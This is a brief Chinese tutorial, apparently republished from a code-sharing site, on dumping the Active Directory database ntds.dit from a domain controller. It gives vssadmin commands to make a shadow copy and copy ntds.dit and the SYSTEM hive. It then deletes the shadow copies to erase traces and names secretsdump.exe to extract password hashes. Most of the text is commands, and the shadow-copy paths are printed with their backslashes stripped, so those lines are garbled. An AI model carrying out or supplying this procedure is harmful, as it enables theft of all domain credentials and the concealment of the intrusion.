脚本宝典收集整理的这篇文章主要介绍了域控上获取Ntds.dit并解密，脚本宝典觉得挺不错的，现在分享给大家，也给大家做个参考。

　　利用Vssadmin程序， 域环境默认安装(支持Server2008、2012)

　　1、先查询当前系统的快照：vssadmin list shadows    命令执行完后显示大致如下

 　　2、创建快照：vssadmin create shadow /for=c:

　　3、然后复制Ntds.dIT文件下来到c盘根目录下

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy2windowsNTDSntds.dit C:ntds.dit

　　4、解密需要用到System文件，所以也需要把这个文件导出来

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy2windowsSystem32configSYSTEM C:system.hive

　　5、删除快照删除痕迹：vssadmin delete shadows /for=c: /quiet

　　6、回过头到第一步，再查看一下当前系统快照，发现没了

　　7、解密Ntds.dit文件，这里使用secretsdump.exe进行解密

脚本宝典总结

以上是脚本宝典为你收集整理的域控上获取Ntds.dit并解密全部内容，希望文章能够帮你解决域控上获取Ntds.dit并解密所遇到的问题。

如果觉得脚本宝典网站内容还不错，欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ：384754419，请注明来意。